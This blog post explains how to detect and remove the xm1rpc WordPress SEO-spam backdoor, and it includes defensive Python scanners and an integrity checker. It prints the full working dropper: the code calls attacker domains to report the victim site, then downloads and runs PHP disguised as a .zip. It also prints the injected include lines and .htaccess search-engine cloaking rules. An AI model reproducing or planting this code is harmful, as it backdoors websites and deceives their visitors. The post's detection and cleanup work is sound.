[Solved] Xm1rpc Backdoor WordPress SEO Spam Hack

Xm1rpc Backdoor WordPress SEO spam hack 2016

I’ve recently come across an issue with some of our monitored WordPress websites: malicious code and files have appeared in the root directory of the WordPress install. The hack is known as the XM1RPC campaign, an SEO spam distribution backdoor. It is identified by the following: the default WordPress xmlrpc.php file is replaced with xm1rpc.php (the digit 1 in place of the letter l makes it easy to overlook in a directory listing), which contains code similar to this:
// Trigger: the dropper only acts when "simpler-ws" appears in the query string.
$query = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '';
if (false !== strpos($query, 'simpler-ws')) {
    __1get_ws();
    $ws_hash   = md5('wsa');
    $cache_dir = __1get_root();
    $ws_file   = $cache_dir.'/'.$ws_hash.'.zip';   // cached payload in the document root, named <md5>.zip
    require($ws_file);                              // the ".zip" is PHP source; require() ignores the extension
    die('');
}

// Derive the document root from the script paths without relying on DOCUMENT_ROOT.
function __1get_root() {
    $localpath    = getenv("SCRIPT_NAME");
    $absolutepath = getenv("SCRIPT_FILENAME");
    $root_path    = substr($absolutepath, 0, strpos($absolutepath, $localpath));
    return $root_path;
}

// Fetch the payload from the C2 and cache it for 24 hours (60*60*24*1 seconds).
function __1get_ws() {
    $host      = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';
    $ws_hash   = md5('wsa');
    $cache_dir = __1get_root();
    $ws_file   = $cache_dir.'/'.$ws_hash.'.zip';
    if (!file_exists($ws_file) || file_exists($ws_file) && (time() - filemtime($ws_file) > 60*60*24*1)) {
        $ws = __1fetch_url(__get_rev().'&get_ws');
        if (!empty($ws)) file_put_contents($ws_file, $ws);
    } else {
        $ws = file_get_contents($ws_file);
    }
    return $ws;
}

// C2 URL; the victim's host name and requested URL are reported to the attacker.
// The second return is dead code (a fallback domain left in the source).
function __get_rev() {
    return 'http://bokoinchina.com/extadult2.php?host='.trim(strtolower($_SERVER['HTTP_HOST']), '.').'&full_url='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
    return 'http://nezlobudnya.com/generate';
}

// Up to three attempts: curl if available, otherwise file_get_contents when allow_url_fopen is on.
function __1fetch_url($url) {
    $contents = false;
    $errs = 0;
    while (!$contents && ($errs++ < 3)) {
        $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';  // spoofed browser UA
        if (is_callable('curl_init')) {
            $c = curl_init($url);
            curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
            curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($c, CURLOPT_USERAGENT, $user_agent);
            $contents = curl_exec($c);
            if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false;
            curl_close($c);
        } else {
            $allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen'));
            if ($allowUrlFopen) {
                $options = array('http' => array('user_agent' => $user_agent));
                $context = stream_context_create($options);
                $contents = @file_get_contents($url, false, $context);
            }
        }
    }
    return $contents;
}

The xm1rpc.php file is a dropper and backdoor: when it is requested with simpler-ws in the query string it fetches PHP code from attacker-controlled domains such as bokoinchina[.]com and nezlobudnya[.]com, caches it in the document root under a .zip file name and executes it with require(). The following files are injected with the following (or similar) code:
  • wp-includes/index.php
  • wp-admin/index.php
  • wp-admin/load.php
  • index.php
error_reporting(0); ini_set("display_errors", 0);   // suppress any warnings the payload might produce
$localpath    = getenv("SCRIPT_NAME");
$absolutepath = getenv("SCRIPT_FILENAME");
$root_path    = substr($absolutepath, 0, strpos($absolutepath, $localpath));   // document root
include_once($root_path."/d730d81e7e1033a51c2bddc5c68874ce.zip");   // ".zip" is PHP source; include_once() ignores the extension
Inside the .htaccess files, rewrite rules like the following have been added. The first block is the cloaking logic: any request whose User-Agent or Referer names a search engine (crawlers, and visitors arriving from search results) is routed to the infected index.php and served spam, while everyone else sees the normal site, which is why the owner rarely notices. The remaining rules map spam URLs (file/<word>/<number>/, kgc/<word>/<number>/, <word>-<slug>-<number>.sql) onto attacker-created files such as file.php and kgc.php.
# Cloaking: search engines and search-referred visitors get the spam via the infected index.php
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]

# Spam URL namespace served by the attacker's file.php
RewriteEngine On
RewriteRule ^file\/[a-zA-Z0-9]+\/[0-9]+\/$ file.php [L]

# Fake ".sql" pages routed to file.php; the !-f/!-d lines are the stock WordPress
# permalink rules, which look legitimate but now hand every request to the infected index.php
RewriteEngine On
RewriteRule ^([a-zA-Z0-9]+)-(.*)-([0-9]+)\.sql$ file.php?$1=$2-$3 [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]

# Same pattern with a different attacker file name
RewriteEngine On
RewriteRule ^kgc\/[a-zA-Z0-9]+\/[0-9]+\/$ kgc.php [L]

A number of .zip files have been dropped into the document root and wp-includes, named with 32-character hex strings such as d730d81e7e1033a51c2bddc5c68874ce.zip. Despite the extension they are not archives: they are obfuscated PHP source, and because PHP's include()/require() do not care about the file extension, the injected include_once lines execute them directly. In my case malicious code was also added to /wp-includes/load.php, a WordPress core file that is loaded on every request; the injected code recreates xm1rpc.php and re-adds the .htaccess rules, so cleaning only the visible files leads to reinfection.
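Putting the indicators above into a scan: the following is an added example, not code from the original post. It walks a WordPress document root and flags the artefacts this campaign leaves behind: a file named xm1rpc.php, an include of a 32-hex-character ".zip", files named .zip that lack the ZIP magic bytes, the search-engine cloaking RewriteCond and the .sql-to-file.php route, and the dropper's own strings (simpler-ws, __1get_ws, __1fetch_url). The sample tree it scans is constructed inline for illustration; run it against a real install with scan("/var/www/html").

```python
"""Indicator scan for the xm1rpc campaign (added example; sample tree is constructed)."""
import os
import re
import shutil
import tempfile

# Search-engine UA/Referer condition that cloaks the spam from ordinary visitors.
CLOAK_RE = re.compile(r"RewriteCond\s+%\{HTTP_(?:USER_AGENT|REFERER)\}\s+.*google\|yahoo", re.I)
# "<word>-<slug>-<n>.sql" spam URLs rewritten onto the attacker's file.php.
SPAM_ROUTE_RE = re.compile(r"RewriteRule\s+\S+\\\.sql\$\s+file\.php", re.I)
# include/include_once of an md5-named ".zip" that is really PHP.
ZIP_INCLUDE_RE = re.compile(r"include(?:_once)?\s*\(.*?[0-9a-f]{32}\.zip", re.I | re.S)
# Strings lifted from the dropper source in the post.
TRIGGER_RE = re.compile(r"simpler-ws|__1get_ws|__1fetch_url")
ZIP_MAGIC = b"PK\x03\x04"  # what a genuine ZIP archive starts with


def scan(root):
    """Walk a WordPress tree; return sorted (relative_path, indicator) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            try:
                with open(full, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            text = data.decode("utf-8", "replace")
            if name == "xm1rpc.php":
                findings.append((rel, "xm1rpc.php dropper present (xmlrpc.php look-alike)"))
            if name == ".htaccess":
                if CLOAK_RE.search(text):
                    findings.append((rel, "search-engine cloaking rewrite"))
                if SPAM_ROUTE_RE.search(text):
                    findings.append((rel, ".sql spam URLs routed to file.php"))
            if name.endswith(".zip") and not data.startswith(ZIP_MAGIC):
                findings.append((rel, "named .zip but not a ZIP archive (PHP payload?)"))
            if name.endswith(".php"):
                if ZIP_INCLUDE_RE.search(text):
                    findings.append((rel, "include of a 32-hex .zip payload"))
                if TRIGGER_RE.search(text):
                    findings.append((rel, "xm1rpc dropper strings"))
    return sorted(findings)


def flagged_paths(findings):
    """Distinct paths that carry at least one indicator."""
    return sorted({rel for rel, _ in findings})


SAMPLE_TREE = {  # constructed sample carrying the indicators described in the post
    "index.php": (
        "<?php\n"
        'error_reporting(0);ini_set("display_errors",0);$localpath=getenv("SCRIPT_NAME");\n'
        '$absolutepath=getenv("SCRIPT_FILENAME");\n'
        "$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));\n"
        'include_once($root_path."/d730d81e7e1033a51c2bddc5c68874ce.zip");\n'
        "define('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n"
    ),
    ".htaccess": (
        "RewriteEngine On\n"
        "RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\n"
        "RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\n"
        "RewriteRule ^.*$ index.php [L]\n"
        "RewriteRule ^([a-zA-Z0-9]+)-(.*)-([0-9]+)\\.sql$ file.php?$1=$2-$3 [L]\n"
    ),
    "xm1rpc.php": (
        "<?php\n$query = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '';\n"
        "if (false !== strpos($query, 'simpler-ws')) { /* dropper body omitted */ }\n"
    ),
    "d730d81e7e1033a51c2bddc5c68874ce.zip": "<?php /* obfuscated payload, constructed stub */\n",
    "wp-includes/load.php": "<?php\n// clean core file (constructed stub)\nfunction wp_check_php_mysql_versions() {}\n",
}


def build_sample_tree():
    """Write SAMPLE_TREE plus one genuine archive (which must not be flagged) to a temp dir."""
    root = tempfile.mkdtemp(prefix="wp-xm1rpc-")
    for rel, body in SAMPLE_TREE.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    uploads = os.path.join(root, "wp-content", "uploads")
    os.makedirs(uploads)
    with open(os.path.join(uploads, "backup.zip"), "wb") as fh:
        fh.write(ZIP_MAGIC + b"\x00" * 26)
    return root


def demo():
    """Build the sample tree, scan it, clean up, return the findings."""
    root = build_sample_tree()
    try:
        return scan(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, why in demo():
        print(f"{rel}: {why}")
```

The ZIP check is deliberately about the magic bytes rather than the contents: any file in a web root that claims to be an archive but does not start with PK\x03\x04 deserves a look, whether or not it happens to begin with <?php. The scanner reads the tree read-only; treat hits as a list for manual review, not as an automatic delete list, because the .htaccess permalink rules it sits next to are legitimate.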

How to clean up and prevent an xm1rpc.php infection

  • Replace wp-includes and wp-admin with fresh copies of the same WordPress version, downloaded from wordpress.org rather than copied from the infected host.
  • Remove the malicious code from all infected files listed above, delete xm1rpc.php and the fake .zip payloads, and strip the injected rewrite rules from every .htaccess.
  • Change the passwords for every account on the WordPress site, and also the hosting control panel, (S)FTP and database credentials; use strong, unique passwords.
  • Avoid hosting several websites under the same shared hosting account: one compromised site can write into the others (cross-contamination), and the same server ends up infected several times over.
  • Update WordPress / the CMS to the latest version and update all plugins and themes.
  • Install a web application firewall for the site.
  • Check core file integrity with a tool such as Wordfence.
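The last step, core file integrity, is the one that catches a reinfection early, and it is worth understanding what such a check has to do. The following is an added example, not code from the post or from Wordfence: it hashes the WordPress core paths (wp-admin/, wp-includes/ and the files directly in the document root, minus the site-specific wp-config.php and .htaccess) and compares them with a known-good manifest, reporting modified, missing and added files. Here the manifest is built from a constructed pristine tree and the infection from the post (a modified wp-includes/load.php, plus xm1rpc.php and a fake .zip) is reproduced on top of it; in practice you would take the manifest from the checksums WordPress publishes for your exact version, which is what the wp-cli command wp core verify-checksums does.

```python
"""Offline core-integrity check (added example; the clean tree and the infection are constructed)."""
import hashlib
import os
import shutil
import tempfile

CORE_DIRS = ("wp-admin", "wp-includes")
SITE_SPECIFIC = {"wp-config.php", ".htaccess"}  # legitimate per-site files: review by hand, not by manifest


def is_core_path(rel):
    """Core = everything under wp-admin/ and wp-includes/, plus root-level files.
    wp-content (themes, plugins, uploads) is site-specific and needs its own baseline."""
    top, _, rest = rel.partition("/")
    if rest:
        return top in CORE_DIRS
    return rel not in SITE_SPECIFIC


def hash_tree(root):
    """Return {relative_path: sha256_hex} for every core file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if not is_core_path(rel):
                continue
            with open(full, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def verify(root, manifest):
    """Compare the live tree with the manifest.

    'added' matters most for this campaign: xm1rpc.php and the fake .zip payloads
    are files the manifest has never heard of, so a check that only compares
    hashes of known files would miss them entirely."""
    actual = hash_tree(root)
    return {
        "modified": sorted(p for p in manifest if p in actual and actual[p] != manifest[p]),
        "missing": sorted(p for p in manifest if p not in actual),
        "added": sorted(p for p in actual if p not in manifest),
    }


PRISTINE = {  # constructed stand-in for a clean WordPress install
    "index.php": "<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n",
    "xmlrpc.php": "<?php\n// stub of the real xmlrpc.php\n",
    "wp-config.php": "<?php\ndefine('DB_NAME', 'example');\n",
    "wp-includes/load.php": "<?php\nfunction wp_check_php_mysql_versions() {}\n",
    "wp-admin/index.php": "<?php\nrequire_once __DIR__ . '/admin.php';\n",
    "wp-content/plugins/hello.php": "<?php\n// not core: ignored by the check\n",
}

# The injection from the post, appended to a core file.
INJECT = (
    'error_reporting(0);ini_set("display_errors",0);'
    'include_once($root_path."/d730d81e7e1033a51c2bddc5c68874ce.zip");\n'
)


def write_tree(root, files):
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Baseline a clean tree, reproduce the infection described above, and verify."""
    root = tempfile.mkdtemp(prefix="wp-integrity-")
    try:
        write_tree(root, PRISTINE)
        manifest = hash_tree(root)  # known-good baseline, taken before the compromise
        with open(os.path.join(root, "wp-includes/load.php"), "a", encoding="utf-8") as fh:
            fh.write(INJECT)
        write_tree(root, {
            "xm1rpc.php": "<?php\n// dropper stub\n",
            "d730d81e7e1033a51c2bddc5c68874ce.zip": "<?php\n// payload stub, not an archive\n",
        })
        return verify(root, manifest)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for bucket, paths in demo().items():
        print(bucket, paths)
```

Two design points: the manifest must come from a trusted source, not from the host being checked, otherwise a backdoor that was already present when the baseline was taken is silently whitelisted; and wp-config.php is excluded from the comparison only because its hash legitimately differs per site, so it still has to be read by hand for injected code.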